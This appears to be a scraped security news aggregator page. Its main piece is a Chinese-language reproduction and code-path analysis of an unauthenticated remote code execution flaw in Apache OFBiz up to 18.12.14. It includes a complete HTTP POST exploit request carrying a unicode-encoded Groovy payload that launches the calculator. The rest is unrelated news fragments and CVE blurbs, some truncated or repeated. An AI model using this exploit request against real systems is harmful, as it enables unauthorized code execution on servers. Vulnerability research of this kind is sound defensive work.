Aggregator

Куда пропали китайские хакеры из американских телекоммуникационных систем?

漏洞简介

Apache OFBiz 是一个开源的企业资源规划系统，提供了一整套企业管理解决方案，涵盖了许多领域，包括财务管理、供应链管理、客户关系管理、人力资源管理和电子商务等。Apache OFBiz 基于 Java 开发，采用灵活的架构和模块化设计，使其可以根据企业的需求进行定制和扩展，它具有强大的功能和可扩展性，适用于中小型企业和大型企业，帮助他们提高效率，降低成本，并实现业务流程的自动化和优化。Apache OFBiz 在处理 view 视图渲染的时候存在逻辑缺陷，未经身份验证的攻击者可通过构造特殊 URL 来覆盖最终的渲染视图，从而执行任意代码。

影响版本

Apache OFBiz <\= 18.12.14

漏洞复现

https://github.com/apache/ofbiz-framework/releases/tag/release18.12.14

下载代码链接 https://codeload.github.com/apache/ofbiz-framework/zip/refs/tags/release18.12.14

下载后利用 idea 打开并编译运行

构造发送数据包

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: 127.0.0.1:8443
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 272

groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

成功执行打开计算器的命令

\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b 是 throw new Exception('calc'.execute().text); 进行编码后的数据

漏洞分析

applications\accounting\webapp\accounting\WEB-INF\web.xml

org.apache.ofbiz.webapp.control.ControlServlet 会处理所有以/control/开头的路由

org.apache.ofbiz.webapp.control.ControlServlet#doPost

doPost 方法转换为 doGet 请求

org.apache.ofbiz.webapp.control.ControlServlet#doGet

利用 RequestHandler 来处理请求

org.apache.ofbiz.webapp.control.RequestHandler#doRequest

在 RequestHandler#doRequest 中依次获取路由相关参数

org.apache.ofbiz.base.util.UtilHttp#getApplicationName

org.apache.ofbiz.webapp.control.RequestHandler#getRequestUri

org.apache.ofbiz.webapp.control.RequestHandler#getOverrideViewUri

依次获取到与路由相关的参数后，调用 resolveURI 返回路由对应的配置信息

org.apache.ofbiz.webapp.control.RequestHandler#resolveURI

这里对应的是

framework/webtools/webapp/webtools/WEB-INF/controller.xml

对应的 /webtools/control/main/ 不需要认证，所以可以继续向下执行

通过success获取到返回值的数据赋值给successResponse,然后传递给nextRequestResponse

else if ("view".equals(nextRequestResponse.type)) {
               if (Debug.verboseOn()) Debug.logVerbose("[RequestHandler.doRequest]: Response is a view." + showSessionId(request), module);

               // check for an override view, only used if "success" = eventReturn
               String viewName = (UtilValidate.isNotEmpty(overrideViewUri) && (eventReturn == null || "success".equals(eventReturn))) ? overrideViewUri : nextRequestResponse.value;
               renderView(viewName, requestMap.securityExternalView, request, response, saveName);
           }

在overrideViewUri 非空且 eventReturn 为 null 或 "success" 的情况下，将 viewName 设置为 overrideViewUri。否则将 viewName 设置为 nextRequestResponse.value。

这里请求的路径为 /main/ProgramExport 造成 view 的解析冲突，会进入到 ProgramExport 这个业务中 ，renderView 方法会解析与ProgramExport对应的请求

framework/webtools/widget/EntityScreens.xml

framework/webtools/groovyScripts/entity/ProgramExport.groovy

  

漏洞简介Apache OFBiz 是一个开源的企业资源规划系统，提供了一整套企业管理解决方案，涵盖了许多领域，包括财务管理、供应链管理、客户关系管理、人力资源管理和电子商务等。Apac

为方便深圳市民快速办理医疗保障相关业务，本文整理了深圳市医疗保障局提供的所有线上办理渠道。包括医保参保登记、异地就医备案、门诊住院费用报销、生育保险待遇申领等各类医保服务事项。通过这些官方线上平台，市

Authors:(1) Martyna Wiącek, Institute of Computer Science, Polish Academy of Sciences;(2) Piotr R

2024年12月23日至25日，2025中国信通院深度观察报告会在北京盛大举行。本次大会以“数智赋能，培育发展 […]

再获肯定！CACTER邮件安全网关入选2024年度首期“磐安”优秀案例2024年12月23日至25日，2025中国信

A vulnerability was found in Distributed Data Systems WebHMI 4.0. It has been rated as critical. This issue affects some unknown processing of the component Portal. The manipulation leads to unrestricted upload. The identification of this vulnerability is CVE-2021-43936. The attack may be initiated remotely. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

Утечка выявила неожиданные пробелы в защите немецкого автоконцерна.

A vulnerability classified as critical has been found in TitanHQ SpamTitan 7.07. This affects an unknown part of the file mailqueue.php. The manipulation of the argument quid as part of HTTP GET Request leads to improper input validation. This vulnerability is uniquely identified as CVE-2020-11804. It is possible to initiate the attack remotely. Furthermore, there is an exploit available.

杭州深度求索（DeepSeek）上周宣布了新系列模型 DeepSeek-V3。深度求索表示，DeepSeek-V3 在知识类任务上的水平相比前代 DeepSeek-V2.5 显著提升，接近当前表现最好的模型 Anthropic 的 Claude-3.5-Sonnet-1022。在美国数学竞赛和全国高中数学联赛上，DeepSeek-V3 大幅超过了其他所有开源闭源模型。在生成速度上，DeepSeek-V3 从 20TPS 大幅提高至 60TPS。官方技术论文披露，DeepSeek-V3 模型的总训练成本为 557.6 万美元，而 GPT-4o 等模型的训练成本约为 1 亿美元。DeepSeek-V3 有 6710 亿参数，在两个月时间内用 14.8 万亿 token 的数据进行了训练。前 OpenAI 和特斯拉高管 Andrej Karpathy 称，Llama 3 4050 亿参数模型使用了 3080 万 GPU 小时训练，DeepSeek-V3 参数规模更大，但只使用了 280 万 GPU 小时训练。如果它通过了氛围检查（vibe checks），那么这将是在资源受限的情况下研究和工程方面的一次令人印象深刻的展示。

杭州深度求索（DeepSeek）上周宣布了新系列模型 DeepSeek-V3。深度求索表示，DeepSeek-V3 在知识类任务上的水平相比前代 DeepSeek-V2.5 显著提升，接近

Microsoft has issued a warning about a significant issue impacting devices running Windows 11, version 24H2, that could block essential Windows Security updates. The problem arises when users install this version of the operating system using media—such as CDs or USB drives—containing either the October 2024 or November 2024 security updates. If affected, devices may […]

The post Microsoft Warns of Windows 11 24H2 Issue that Blocks Windows Security Updates appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Overview The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 185 vulne

Authors:(1) Martyna Wiącek, Institute of Computer Science, Polish Academy of Sciences;(2) Piotr R

The wait for the next Season is over! Check out what we have in store, you might be in for a welcomed surprise!

A vulnerability was found in Linux Kernel 2.6.20/2.6.20.1/2.6.20.2 and classified as critical. Affected by this issue is the function do_dccp_getsockopt. The manipulation leads to denial of service. This vulnerability is handled as CVE-2007-1734. Attacking locally is a requirement. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

A vulnerability has been found in Novell NetWare 5.0/5.1 and classified as problematic. This vulnerability affects unknown code of the component Novonyx Server. The manipulation leads to information disclosure. This vulnerability was named CVE-2002-1634. The attack can be initiated remotely. Furthermore, there is an exploit available.

大众集团在安全性较差的亚马逊云服务器上存储了来自奥迪、大众、西雅特和斯柯达等品牌共80万辆电动汽车的敏感信息。